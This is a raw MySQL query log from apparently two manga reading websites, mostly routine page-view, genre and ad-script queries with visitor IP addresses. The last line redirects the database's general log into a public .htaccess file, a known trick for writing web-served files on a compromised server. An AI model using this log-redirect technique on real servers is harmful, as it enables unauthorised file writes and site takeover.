latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 260225 19:30:16 330661976 Quit 330661977 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661978 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661977 Quit 330661978 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661978 Quit 330661979 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661980 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661979 Quit 330661980 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661980 Quit 330661981 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661982 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661981 Quit 330661982 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661982 Quit 330661983 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661984 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330661983 Quit 330661984 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661984 Quit 330661985 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661986 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661985 Quit 330661986 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14917' 330661986 Quit 330661987 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661987 Query select * FROM chapters where id = '14917' 330661987 Quit 330661988 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661988 Query select * FROM chapters where manga_id = '292' order by id desc 330661988 Quit 330661989 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661989 Query Update chapters set view=view+1 where id = '14917' 330661989 Quit 330661990 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661990 Query select * FROM chapters where id = '14917' 330661990 Quit 330661991 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661991 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14917' 330661992 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661992 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('292', '14917', '102.187.162.100', 'mangacherri.com', '2026-02-26 03:30:16', '2026-02-26 03:30:16') 330661991 Quit 330661992 Quit 330661993 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661993 Query select * FROM chapter_images where chapter_id = '14917' 330661993 Quit 330661994 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661994 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '292' and m.active = 1 330661994 Quit 330661995 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661995 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='292' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Gyaru%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Seinen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330661965 Quit 330661996 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661997 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661996 Quit 330661997 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330661997 Quit 330661998 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661999 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330661998 Quit 330661999 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330661999 Quit 330662000 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662001 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662001 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662000 Quit 330662001 Quit 330662002 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662003 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662002 Quit 330662003 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662003 Quit 330662004 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662005 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662004 Quit 330662005 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1025' 330662005 Quit 330662006 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662006 Query select * FROM chapters where id = '1025' 330662006 Quit 330662007 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662007 Query select * FROM chapters where manga_id = '30' order by id desc 330662007 Quit 330662008 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662008 Query Update chapters set view=view+1 where id = '1025' 330662008 Quit 330662009 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662009 Query select * FROM chapters where id = '1025' 330662009 Quit 330662010 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662010 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1025' 330662011 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662010 Quit 330662011 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('30', '1025', '2a03:2880:f804:28::', 'mangacherri.com', '2026-02-26 03:30:16', '2026-02-26 03:30:16') 330662011 Quit 330662012 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662012 Query select * FROM chapter_images where chapter_id = '1025' 330661995 Quit 330662013 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662014 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662013 Quit 330662014 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330662014 Quit 330662015 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662016 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662015 Quit 330662016 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662016 Quit 330662017 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662018 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662018 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662017 Quit 330662018 Quit 330662019 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662020 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662019 Quit 330662020 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662020 Quit 330662012 Quit 330662021 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662021 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '30' and m.active = 1 330662021 Quit 330662022 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662022 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='30' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:30:17 330662023 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662024 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662023 Quit 330662024 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330662022 Quit 330662025 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662026 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662026 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330662025 Quit 330662026 Quit 330662027 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662028 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662027 Quit 330662028 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662028 Quit 330662029 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662030 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662029 Quit 330662030 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662030 Quit 330662031 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662032 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662031 Quit 330662032 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662032 Quit 330662033 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662034 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330662033 Quit 330662034 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Romance%') as k where latest_chapter_id > 0 330662035 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662036 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662035 Quit 330662036 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9321' and m.active = 1 330662036 Quit 330662037 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662037 Query select * FROM chapters where id = '9321' 330662037 Quit 330662038 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662038 Query select * FROM chapters where manga_id = '206' order by display_priority ASC, id desc 330662038 Quit 330662039 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662039 Query Update chapters set view=view+1 where id = '9321' 330662039 Quit 330662040 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662040 Query select * FROM chapters where id = '9321' 330662040 Quit 330662041 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662041 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '9321' and m.active = 1 330662041 Quit 330662042 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662042 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('206', '9321', '216.244.66.201', 'mangaberri.com', '2026-02-26 03:30:17', '2026-02-26 03:30:17') 330662042 Quit 330662043 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662043 Query select * FROM chapter_images where chapter_id = '9321' 330662043 Quit 330662044 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662044 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '206' and m.active = 1 330662044 Quit 330662045 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662045 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='206' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%School%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330662045 Quit 330662046 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662047 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662046 Quit 330662047 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330662047 Quit 330662048 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662049 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662048 Quit 330662049 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662049 Quit 330662050 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662051 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662050 Quit 330662051 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662051 Quit 330662052 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662053 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330662052 Quit 330662053 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330662053 Quit 330475988 Query SET GLOBAL general_log_file = '/var/www/html/mangaberri/public_html/ads/.htaccess'
Close